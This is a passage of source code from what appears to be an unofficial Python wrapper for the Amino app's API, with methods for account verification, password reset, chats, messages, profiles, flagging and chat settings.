- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"validationContext": {
"type": 1,
"identity": email,
"data": {"code": code}},
"deviceID": device.device_id,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/auth/check-security-validation", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def request_verify_code(self, email: str, resetPassword: bool = False):
"""
Request an verification code to the targeted email.
**Parameters**
- **email** : Email of the account.
- **resetPassword** : If the code should be for Password Reset.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"identity": email,
"type": 1,
"deviceID": device.device_id
}
if resetPassword is True:
data["level"] = 2
data["purpose"] = "reset-password"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/auth/request-security-validation", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def activate_account(self, email: str, code: str):
"""
Activate an account.
**Parameters**
- **email** : Email of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"type": 1,
"identity": email,
"data": {"code": code},
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/activate-email", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
# Provided by "𝑰 𝑵 𝑻 𝑬 𝑹 𝑳 𝑼 𝑫 𝑬#4082"
def delete_account(self, password: str):
"""
Delete an account.
**Parameters**
- **password** : Password of the account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": device.device_id,
"secret": f"0 {password}"
})
response = requests.post(f"{self.api}/g/s/account/delete-request", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def change_password(self, email: str, password: str, code: str):
"""
Change password of an account.
**Parameters**
- **email** : Email of the account.
- **password** : Password of the account.
- **code** : Verification code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"updateSecret": f"0 {password}",
"emailValidationContext": {
"data": {
"code": code
},
"type": 1,
"identity": email,
"level": 2,
"deviceID": device.device_id
},
"phoneNumberValidationContext": None,
"deviceID": device.device_id
})
response = requests.post(f"{self.api}/g/s/auth/reset-password", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def check_device(self, deviceId: str):
"""
Check if the Device ID is valid.
**Parameters**
- **deviceId** : ID of the Device.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"deviceID": deviceId,
"bundleID": "com.narvii.amino.master",
"clientType": 100,
"timezone": -timezone // 1000,
"systemPushEnabled": True,
"locale": locale()[0],
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/device", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: self.configured = True; return response.status_code
def get_account_info(self):
response = requests.get(f"{self.api}/g/s/account", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["account"]).UserProfile
def upload_media(self, file: BinaryIO, fileType: str):
"""
Upload file to the amino servers.
**Parameters**
- **file** : File to be uploaded.
**Returns**
- **Success** : Url of the file uploaded to the server.
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if fileType == "audio":
t = "audio/aac"
elif fileType == "image":
t = "image/jpg"
else: raise exceptions.SpecifyType(fileType)
data = file.read()
response = requests.post(f"{self.api}/g/s/media/upload", data=data, headers=headers.Headers(type=t, data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["mediaValue"]
def handle_socket_message(self, data):
return self.resolve(data)
def get_eventlog(self):
response = requests.get(f"{self.api}/g/s/eventlog/profile?language=en", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)
def sub_clients(self, start: int = 0, size: int = 25):
"""
List of Communities the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommunityList(json.loads(response.text)["communityList"]).CommunityList
def sub_clients_profile(self, start: int = 0, size: int = 25):
if not self.authenticated: raise exceptions.NotLoggedIn()
response = requests.get(f"{self.api}/g/s/community/joined?v=1&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["userInfoInCommunities"]
def get_user_info(self, userId: str):
"""
Information of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`User Object <amino.lib.util.objects.UserProfile>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfile(json.loads(response.text)["userProfile"]).UserProfile
def get_chat_threads(self, start: int = 0, size: int = 25):
"""
List of Chats the account is in.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Chat List <amino.lib.util.objects.ThreadList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread?type=joined-me&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.ThreadList(json.loads(response.text)["threadList"]).ThreadList
def get_chat_thread(self, chatId: str):
"""
Get the Chat Object from an Chat ID.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : :meth:`Chat Object <amino.lib.util.objects.Thread>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Thread(json.loads(response.text)["thread"]).Thread
def get_chat_users(self, chatId: str, start: int = 0, size: int = 25):
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/member?start={start}&size={size}&type=default&cv=1.2", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["memberList"]).UserProfileList
def join_chat(self, chatId: str):
"""
Join an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def leave_chat(self, chatId: str):
"""
Leave an Chat.
**Parameters**
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def start_chat(self, userId: [str, list], message: str, title: str = None, content: str = None, isGlobal: bool = False, publishToGlobal: bool = False):
"""
Start an Chat with an User or List of Users.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **message** : Starting Message.
- **title** : Title of Group Chat.
- **content** : Content of Group Chat.
- **isGlobal** : If Group Chat is Global.
- **publishToGlobal** : If Group Chat should show in Global.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = {
"title": title,
"inviteeUids": userIds,
"initialMessageContent": message,
"content": content,
"timestamp": int(timestamp() * 1000)
}
if isGlobal is True: data["type"] = 2; data["eventSource"] = "GlobalComposeMenu"
else: data["type"] = 0
if publishToGlobal is True: data["publishToGlobal"] = 1
else: data["publishToGlobal"] = 0
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def invite_to_chat(self, userId: [str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
response = requests.get(url, headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetMessages(json.loads(response.text)).GetMessages
def get_message_info(self, chatId: str, messageId: str):
"""
Information of an Message from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **message** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Message(json.loads(response.text)["message"]).Message
def get_community_info(self, comId: str):
"""
Information of an Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.Community(json.loads(response.text)["community"]).Community
def search_community(self, aminoId: str):
"""
Search a Community byt its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else:
response = json.loads(response.text)["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.VisitorsList(json.loads(response.text)).VisitorsList
def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.UserProfileList(json.loads(response.text)["userProfileList"]).UserProfileList
def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetBlogInfo(json.loads(response.text)).GetBlogInfo
elif wikiId:
response = requests.get(f"{self.api}/g/s/item/{wikiId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.GetWikiInfo(json.loads(response.text)).GetWikiInfo
elif fileId:
response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.SharedFolderFile(json.loads(response.text)["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
if blogId or quizId:
if quizId is not None: blogId = quizId
response = requests.get(f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif wikiId: response = requests.get(f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
elif fileId: response = requests.get(f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: raise exceptions.SpecifyType()
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
response = requests.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return json.loads(response.text)["blockerUidList"]
def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of an User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.SpecifyType
response = requests.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return objects.CommentList(json.loads(response.text)["commentList"]).CommentList
def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/{flg}", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff: response = requests.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
else: response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=headers.Headers().headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: return exceptions.CheckException(json.loads(response.text))
else: return response.status_code
def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: str = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Send a Message to a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Url of the Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If the Chat should Do Not Disturb or not.
- **pinChat** : If the Chat should Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"] = {"announcement": announcement}
if pinAnnouncement: data["extensions"] = {"pinAnnouncement": pinAnnouncement}
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if pinChat is not None:
if pinChat:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", data=data, headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not pinChat:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", data=data, headers=headers.Headers().headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if backgroundImage is not None:
data = json.dumps({"media": [100, backgroundImage, None], "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if viewOnly is not None:
if viewOnly:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not viewOnly:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canInvite is not None:
if canInvite:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canInvite:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if canTip is not None:
if canTip:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
if not canTip:
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", data=data, headers=headers.Headers(data=data).headers, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
data = json.dumps(data)
response = requests.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=headers.Headers(data=data).headers, data=data, proxies=self.proxies, verify=self.certificatePath)
if response.status_code != 200: res.append(exceptions.CheckException(json.loads(response.text)))
else: res.append(response.status_code)
return res
def visit(self, userId: str):
"""
Visit an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
